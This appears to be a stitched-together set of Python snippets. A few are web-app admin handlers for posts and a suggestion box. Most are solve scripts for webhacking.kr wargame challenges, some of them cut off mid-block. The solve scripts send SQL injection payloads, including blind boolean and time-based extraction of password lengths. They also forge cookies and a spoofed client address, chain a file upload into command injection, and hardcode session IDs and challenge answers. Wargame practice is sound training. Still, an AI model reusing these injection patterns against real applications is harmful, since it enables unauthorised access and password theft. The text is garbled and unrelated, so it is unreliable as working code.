def get(self): # Check cookie exp = self.request.cookies.get('expire') logging.info(exp) if (exp != None): valid = CookieManager.checkCookie(exp) else: valid = 0 saranObject = Saran.Saran() # Get Delete ID deleteID = self.request.get('deleteid') # Delete Saran with Proper ID if (deleteID != ''): saranObject.deleteSaran(deleteID) source = 'saran' # When the page first loads, null template template_values = { 'valid': valid, 'source': source, } template = JINJA_ENVIRONMENT.get_template('/redirect.html') self.response.write(template.render(template_values))
def post(self): # Variables form = self.request.get('submitType') title = None content = None exp = self.request.cookies.get('expire') logging.info(exp) if (exp != None): valid = CookieManager.checkCookie(exp) else: valid = 0 if form == 'submitPost': title = self.request.get('title') content = self.request.get('content') # Instantiate Blog class postObject = Post.Post() # Insert the attributes to data store postObject.insertToDatastore(title, content) # Loads the page template_values = { 'valid': valid, } template = JINJA_ENVIRONMENT.get_template('/admin/dashboard.html') self.response.write(template.render(template_values))
def getPassword(portNumber): serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) serverSocket.bind(('', portNumber)) serverSocket.listen(1) conn, _ = serverSocket.accept() while True: time.sleep(1) data = conn.recv(4096) if data.find('Password'): print data challengeUrl = "http://webhacking.kr/index.php?mode=auth_go" parameter = urllib.urlencode( {"answer": "38b4436dc68588052e60316619b33969"}) httpRequest = urllib2.Request(challengeUrl, data=parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() sys.exit(0) if serverSocket != None: serverSocket.close()
def get(self): # Cookie check exp = self.request.cookies.get('expire') logging.info(exp) if (exp != None): valid = CookieManager.checkCookie(exp) else: valid = 0 # Define variables saranObject = Saran.Saran() listSaran2 = saranObject.listSaran() count = len(listSaran2) # List saranIDList = [] nameList = [] emailList = [] contentList = [] datetimeList = [] # Timezone convertion # Set timezone jkt = timezone('Asia/Jakarta') utc = timezone('UTC') # For post in posts ... for saran in listSaran2: # Convert timezone utc_dt = utc.localize(saran.date) jkt_dt = utc_dt.astimezone(jkt) content = saran.isi if (len(content) > 50): content = content[:50] + "..." # Insert to list nameList.append(saran.nama) emailList.append(saran.email) contentList.append(content) datetimeList.append(jkt_dt.strftime("%d-%m-%Y %H:%M:%S")) saranIDList.append(saran.key.id()) # Loads the page template_values = { 'valid': valid, 'count': count, 'nameList': nameList, 'emailList': emailList, 'contentList': contentList, 'datetimeList': datetimeList, 'saranIDList': saranIDList, } template = JINJA_ENVIRONMENT.get_template('/admin/kotak-saran.html') self.response.write(template.render(template_values))
def get(self): # Cookie check exp = self.request.cookies.get('expire') logging.info(exp) if (exp != None): valid = CookieManager.checkCookie(exp) else: valid = 0 # Define variables postObject = Post.Post() posts = postObject.listPosts() count = len(posts) # List postIDList = [] titleList = [] contentList = [] datetimeList = [] # Timezone convertion # Set timezone jkt = timezone('Asia/Jakarta') utc = timezone('UTC') # For post in posts ... for post in posts: # Convert timezone utc_dt = utc.localize(post.date) jkt_dt = utc_dt.astimezone(jkt) content = post.content if (len(content) > 50): content = content[:50] + "..." # Insert to list titleList.append(post.title) contentList.append(content) datetimeList.append(jkt_dt.strftime("%d-%m-%Y %H:%M:%S")) postIDList.append(post.key.id()) # Loads the page template_values = { 'valid': valid, 'count': count, 'titleList': titleList, 'contentList': contentList, 'datetimeList': datetimeList, 'postIDList': postIDList, } template = JINJA_ENVIRONMENT.get_template('/admin/post-menu.html') self.response.write(template.render(template_values))
def __init__(self): # 每个记录提取来一遍 # self.bf = Bl.BloomCheckFunction() # 对象初始化 只需要初始化一遍 self.dbname = 'cookiemanage' self.tname = 'cookiesmanager' self.c = CookManager.CookieManager(self.dbname, self.tname) #从数据库中获取cook self.p = Ip.IpManager() self.cooklist = self.getcookfromsql() self.proxy = self.p.getproxyfromipsql(10) self.pro = ''
def get(self): exp = self.request.cookies.get('expire') logging.info(exp) if (exp != None): valid = CookieManager.checkCookie(exp) else: valid = 0 # Loads the page template_values = { 'valid': valid, } template = JINJA_ENVIRONMENT.get_template('/admin/dashboard.html') self.response.write(template.render(template_values))
def get(self): # Check cookie exp = self.request.cookies.get('expire') logging.info(exp) if (exp != None): valid = CookieManager.checkCookie(exp) else: valid = 0 postObject = Post.Post() # Get Delete ID deleteID = self.request.get('deleteid') # Get Edit ID editID = self.request.get('editid') # Delete Post with Proper ID if (deleteID != ''): postObject.deletePost(deleteID) source = 'post' # When the page first loads, null template template_values = { 'valid': valid, 'source': source, } template = JINJA_ENVIRONMENT.get_template('/redirect.html') self.response.write(template.render(template_values)) elif (editID != ''): post = postObject.getPost(editID) # Loads edit page template_values = { 'valid': valid, 'editID': editID, 'post': post, } template = JINJA_ENVIRONMENT.get_template('/admin/edit-menu.html') self.response.write(template.render(template_values))
#-*- coding: utf-8 -*- import urllib import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-03/index.php" sessionId = "d106ebfb4bba898681f92c7f5316fa6b" print "[*] SQL Injection" CookieManager.addCookie("PHPSESSID", sessionId) parameters = urllib.urlencode({"id": "admin", "answer": "1 || 1"}) httpRequest = urllib2.Request(challengeUrl, data=parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import urllib2 import CookieManager print "[+] SQL Injection" challengeUrl = "http://webhacking.kr/challenge/web/web-24/index.php" parameter = "?lv=2%0a||%0aid=0x" + "admin".encode("hex") print parameter CookieManager.addCookie("PHPSESSID", "73ea5f35f558006f21f6185c171a2ed9") httpRequest = urllib2.Request(challengeUrl + parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
1) user_lv의 첫 번째 문자가 "0~9", ",", "."이어야 함 2) user_lv의 값이 6보다 작아야 함 3) user_lv의 값이 5보다 커야 함 7. 조건을 만족하는 수를 user_lv 쿠키에 설정하여 해당 페이지를 호출하면 solve - 5 < user_lv < 6인 값을 쿠키에 설정하여 호출 - Hint : 숫자를 제외한 "." 문자도 사용 가능 """ import traceback import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-01/" CookieManager.addCookie("PHPSESSID=da0bd6cb852292c17cc2364c9dc6d334" ) # webhacking.kr에 로그인 하고 나온 cookie CookieManager.addCookie("user_lv=5.5") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
ipAddress = "" httpConnection = None print "[+] Find IP Address" try: httpRequest = urllib2.Request("https://api.ipify.org") httpConnection = urllib2.urlopen(httpRequest) ipAddress = httpConnection.read() print "[*] Your IP Address is [", ipAddress, "]" except: raise finally: if httpConnection != None: httpConnection.close() # File Upload CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29") challengeUrl = "http://webhacking.kr/challenge/web/web-18/" uploadFile = { "upfile": ("tmp-" + str(int(time.time())+5), ipAddress) } sessionCookie = { "PHPSESSID": "a90f69bdc1cdceaf479ca1ebcd368d29" } httpConnection = None try: print "[*] Finding password" for idx in range(0, 5): httpRequest = requests.post(challengeUrl, files=uploadFile, cookies=sessionCookie) sys.stdout.write(".")
#-*- coding: utf-8 -*- import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-35/g1v2m2passw0rd.php" print "[*] Clear Challenge 58" CookieManager.addCookie("PHPSESSID", "e52509baa15ced3a5be56d2efc0239b6") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import sys import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-10/index.php" trueCondition = "<td>1</td>" flagCount = 0 isFoundFlagCount = False CookieManager.addCookie("PHPSESSID", "eabcdebaaabceddaabeabddefcabcdbe") print "[*] Find flag count from prob13password" for flagCount in range(1, 20): parameter = "?no=if((select(count(flag))from(prob13password))in(%d),1,2)" % flagCount httpRequest = urllib2.Request(challengeUrl + parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", flagCount if httpResponse.find(trueCondition) > 0: print "[+] FIND IT! flag count is [", flagCount, "]" isFoundFlagCount = True break except: raise finally:
#-*- coding: utf-8 -*- import urllib import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-05/mem/join.php" CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92") parameters = urllib.urlencode({"id": "admin ", "pw": "1q2w3e"}) httpRequest = urllib2.Request(challengeUrl, data=parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() challengeUrl = "http://webhacking.kr/challenge/web/web-05/mem/login.php" parameters = urllib.urlencode({"id": "admin", "pw": "1q2w3e"}) httpRequest = urllib2.Request(challengeUrl, data=parameters) httpRequest.add_header("Cookie", CookieManager.getCookie())
#-*- coding: utf-8 -*- import urllib import urllib2 import hashlib import CookieManager import time httpConnection = None challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-6/?get=hehe" CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() # Level 2 challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-6/lv2.php" CookieManager.addCookie("PHPSESSID", "a90f69bdc1cdceaf479ca1ebcd368d29") parameters = urllib.urlencode({"post": "hehe", "post2": "hehe2"}) httpRequest = urllib2.Request(challengeUrl, data=parameters)
httpRequest = requests.post(challengeUrl, files=uploadFile, cookies=sessionCookie, data=parameter) print httpRequest.text startTimeIndex = httpRequest.text.find("time") + 5 endTimeIndex = httpRequest.text.find(">", startTimeIndex) timestamp = httpRequest.text[startTimeIndex:endTimeIndex] except: raise finally: if httpConnection != None: httpConnection.close() print "[*] Delete File and Command Injection" CookieManager.addCookie("PHPSESSID", "aebaacacaaaaaabcaaaeadabafbccab") parameter = "?mode=del&time=" + timestamp httpRequest = urllib2.Request(challengeUrl + parameter) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close() print "[*] Clear Challenge 48"
#-*- coding: utf-8 -*- import sys import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-02/" falseCondition = "<!--2070-01-01 09:00:00-->" trueCondition = "<!--2070-01-01 09:00:01-->" print "[*] Find password length from Freeboard" passwordLength = 0 isFoundPassword = False CookieManager.addCookie("PHPSESSID", "d106ebfb4bba898681f92c7f5316fa6b") for passwordLength in range(1, 20): timeCookie = "1 and (SELECT length(password) FROM FreeB0aRd)=%d" % passwordLength CookieManager.addCookie("time", timeCookie) httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", passwordLength if httpResponse.find(trueCondition) > 0: print "[+] FIND IT! password length is [", passwordLength, "]"
#-*- coding: utf-8 -*- import sys import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-29/index.php" trueCondition = "admin password" print "[*] Find admin password length" passwordLength = 0 isFoundPassword = False CookieManager.addCookie("PHPSESSID", "0eb95c9c96a3a8bc908e5d828f22cc3b") for passwordLength in range(1, 20): parameters = "?no=-1||no=2%26%26length(pw)=" + str(passwordLength) + "&id=0x61646d696e&pw=guest" httpRequest = urllib2.Request(challengeUrl + parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", passwordLength if httpResponse.find(trueCondition) > 0: print "[+] FIND IT! password length is [", passwordLength, "]" isFoundPassword = True break except: raise finally: if httpConnection != None:
#-*- coding: utf-8 -*- import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/web/web-06" CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92") CookieManager.addCookie( "user", "Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMWRyV@&kV0!ERkZVbFJHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMXdUMVF$TUhoalJscFlZbGhTV0ZSV@FFTlNiRnBZWlVaT!ZXSlZXVEpWYkZKRFZqQXhkVlZ!V@xaaGExcFlXa!ZhVDJOc@NFZGhSMnhUVFcxb@IxWXhaREJaVmxsM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WMUo!VmpKNFQxWlhTbFpYVkVwV!lrWktTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXWVZReFdsaFRiRnBZVmtWd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYySkdhM@hXYTFwaFZURlZlRmR!U@s!WFJYQnhWVzB^YjFZeFVsaE9WazVPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZZd0!WWmlla!pYWWxoQ!RGUnJXbEpsUm!SellVWlNhVkp!UW&oV!YzaHJWVEZzVjFWc!dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt$V@&kWFIwVjRZMFJPV@!FeVVrZGFWM@hIWTIxS!IxcEhiRmhTVlhCS!ZtMTBVMU!^VlhoWFdHaFlZbXhhVjFsc!pHOVdSbXhaWTBaa@JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa@Q0YTFOR!ZuTlhiRlpYWWtoQ!NWWkdVa@RWTVZwMFVtdG9VRll&YUhCVmJHaERUbXhrVlZGdFJtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&OT@JFcHpXa@R$YVZORlNrbFdNblJyWXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa$AxVVd^d!YySllVbGhhUkVaYVpVZEtTVk&zYUdoTk!VcFZWbGN^TkdReVZrZFdiR!JvVW&wc@IxUldXbmRsYkZsNVkwVmtWMDFFUmpGWlZXaExWMnhhV0ZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ==" ) CookieManager.addCookie( "password", "Vm0wd@QyUXlVWGxWV0d^V!YwZDRWMVl$WkRSV0!WbDNXa!JTVjAxV@JETlhhMUpUVmpBeFYySkVUbGhoTVVwVVZtcEJlRll&U@tWVWJHaG9UVlZ$VlZadGNFSmxSbGw!VTJ0V!ZXSkhhRzlVVmxaM!ZsWmFjVkZ0UmxSTmJFcEpWbTEwYTFkSFNrZGpSVGxhVmpOU!IxcFZXbUZrUjA!R!UyMTRVMkpIZHpGV!ZFb$dWakZhV0ZOcmFHaFNlbXhXVm!wT!QwMHhjRlpYYlVaclVqQTFSMWRyV@&kV0!ERkZVbFJHVjFaRmIzZFdha!poVjBaT@NtRkhhRk&sYlhoWFZtMXdUMVF$TUhoalJscFlZbGhTV0ZSV@FFTlNiRnBZWlVaT!ZXSlZXVEpWYkZKRFZqQXhkVlZ!V@xaaGExcFlXa!ZhVDJOc@NFZGhSMnhUVFcxb@IxWXhaREJaVmxsM!RVaG9hbEpzY0ZsWmJGWmhZMnhXY!ZGVVJsTk&WMUo!VmpKNFQxWlhTbFpYVkVwV!lrWktTRlpxUm!GU@JVbDZXa!prYUdFeGNHOVdha0poVkRKT@RGSnJhR@hTYXpWeldXeG9iMWRHV@&STldHUlZUVlpHTTFSVmFHOWhiRXB*WTBac!dtSkdXbWhaTVZwaFpFZFNTRkpyTlZOaVJtOTNWMnhXWVZReFdsaFRiRnBZVmtWd!YxbHJXa$RUUmxweFVtMUdVMkpWYkRaWGExcHJZVWRGZUdOSE9WZGhhMHBvVmtSS!QyUkdTbkpoUjJoVFlYcFdlbGRYZUc&aU!XUkhWMjVTVGxOSGFGQlZiVEUwVmpGU!ZtRkhPVmhTTUhCNVZHeGFjMWR0U@tkWGJXaGFUVzVvV0ZreFdrZFdWa$B*VkdzMVYySkdhM@hXYTFwaFZURlZlRmR!U@s!WFJYQnhWVzB^YjFZeFVsaE9WazVPVFZad@VGVXlkREJXTVZweVkwWndXR0V^Y0ROV@FrWkxWakpPU!dKR!pGZFNWWEJ@Vm!0U!MxUXlUWGxVYTFwb!VqTkNWRmxZY0ZkWFZscFlZMFU!YVUxcmJEUldNalZUVkd^a!NGVnNXbFZXYkhCWVZHdGFWbVZIUmtoUFYyaHBVbGhDTmxkVVFtRmpNV!IwVTJ0a!dHSlhhR0ZVVnpWdlYwWnJlRmRyWkZkV@EzQjZWa@R*TVZZd0!WWmlla!pYWWxoQ!RGUnJXbEpsUm!SellVWlNhVkp!UW&oV!YzaHJWVEZzVjFWc!dsaGlWVnBQVkZaYWQyVkdWWGxrUkVKWFRWWndlVmt$V@&kWFIwVjRZMFJPV@!FeVVrZGFWM@hIWTIxS!IxcEhiRmhTVlhCS!ZtMTBVMU!^VlhoWFdHaFlZbXhhVjFsc!pHOVdSbXhaWTBaa@JHSkhVbGxhVldNMVlWVXhXRlZyYUZkTmFsWlVWa@Q0YTFOR!ZuTlhiRlpYWWtoQ!NWWkdVa@RWTVZwMFVtdG9VRll&YUhCVmJHaERUbXhrVlZGdFJtcE&WMUl$VlRKMGExZEhTbGhoUjBaVlZucFdkbFl$V@&OT@JFcHpXa@R$YVZORlNrbFdNblJyWXpGVmVWTnVTbFJpVlZwWVZGYzFiMWRHWkZkWGJFcHNVbTFTZWxsVldsTmhWa$AxVVd^d!YySllVbGhhUkVaYVpVZEtTVk&zYUdoTk!VcFZWbGN^TkdReVZrZFdiR!JvVW&wc@IxUldXbmRsYkZsNVkwVmtWMDFFUmpGWlZXaExWMnhhV0ZWclpHRldNMmhJV!RJeFMxSXhjRWhpUm!oVFZsaENTMVp0TVRCVk!VMTRWbGhvV0ZkSGFGbFpiWGhoVm!^c@NscEhPV$BTYkhCNFZrY$dOVll^V@&OalJXaFlWa!UxZGxsV!ZYaFhSbFp&WVVaa!RtRnNXbFZXYTJRMFdWWktjMVJ!VG!oU@JGcFlXV$hhUm!ReFduRlJiVVphVm0xU!NWWlhkRzloTVVwMFlVWlNWVlpXY0dGVVZscGhZekZ$UlZWdGNFNVdNVWwzVmxSS0!HRXhaRWhUYkdob!VqQmFWbFp0ZUhkTk!WcHlWMjFHYWxacmNEQmFSV!F$VmpKS@NsTnJhRmRTTTJob!ZrUktSMVl^VG&WVmJFSlhVbFJXV!ZaR!l*RmlNV!JIWWtaV!VsZEhhRlJVVm!SVFpXeHNWbGRzVG!oU!ZFWjZWVEkxYjFZeFdYcFZiR@hZVm!^d!lWcFZXbXRrVmtwelZtMXNWMUl*YURWV0!XUXdXVmRSZVZaclpGZGliRXB&Vld0V!MySXhiRmxqUldSc!ZteEtlbFp0TURWWFIwcEhZMFpvV@sxSGFFeFdNbmhoVjBaV@NscEhSbGROTW!oSlYxUkplRk!^U!hoalJXUmhVbXMxV0ZZd!ZrdE&iRnAwWTBWa!dsWXdWalJXYkdodlYwWmtTR0ZHV@xwaVdHaG9WbTE0YzJOc!pISmtSM0JUWWtad0&GWlhNVEJOUmxsNFYyNU9hbEpYYUZoV@FrNVRWRVpzVlZGWWFGTldhM0I@VmtkNFlWVXlTa!pYV0hCWFZsWndSMVF^V@tOVmJFSlZUVVF$UFE9PQ==" ) httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import urllib import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/index.php?mode=auth_go" parameter = urllib.urlencode({ "answer": str(510*510) }); httpRequest = urllib2.Request(challengeUrl, data=parameter) CookieManager.addCookie("PHPSESSID", "5da1398a14fd19ed8ddcfb5ace4f7ac6") httpRequest.add_header("Cookie", CookieManager.getCookie()) httpRequest.get_method = lambda: 'POST' httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import urllib2 import CookieManager challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-4/" CookieManager.addCookie("PHPSESSID", "e28ad7cb81a98a13982054373940bf92") CookieManager.addCookie("REMOTE_ADDR", "112277..00..00..1") httpRequest = urllib2.Request(challengeUrl) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
ipAddress = "" httpConnection = None print "[+] Find IP Address" try: httpRequest = urllib2.Request("https://api.ipify.org") httpConnection = urllib2.urlopen(httpRequest) ipAddress = httpConnection.read() print "Your IP Address is [", ipAddress, "]" except: raise finally: if httpConnection != None: httpConnection.close() print "[*] Try Challenge 11" challengeUrl = "http://webhacking.kr/challenge/codeing/code2.html" \ + "?val=" + urllib.quote("3beeef_bindon" + ipAddress + "bindon\tp\ta\ts\ts") httpRequest = urllib2.Request(challengeUrl) CookieManager.addCookie("PHPSESSID", "79d2e02ad592877ec33fb8651960469d") httpRequest.add_header("Cookie", CookieManager.getCookie()) try: httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print httpResponse except: raise finally: if httpConnection != None: httpConnection.close()
#-*- coding: utf-8 -*- import sys import time import urllib2 import CookieManager challengeUrl = "https://webhacking.kr/challenge/web-34/" print "[+] Find password length" flagLength = 0 isFoundPassword = False CookieManager.addCookie("PHPSESSID", "9gka3g0g4soj3plpg8phk7p56f") for flagLength in range(1, 30): parameters = "?msg=1024" parameters += "&se=if(length(pw)=%d,sleep(5),0)" % flagLength httpRequest = urllib2.Request(challengeUrl+parameters) httpRequest.add_header("Cookie", CookieManager.getCookie()) httpConnection = None try: elapsedTime = time.time() httpConnection = urllib2.urlopen(httpRequest) httpResponse = httpConnection.read() print "[*] Blind SQL Injection...", flagLength elapsedTime = time.time() - elapsedTime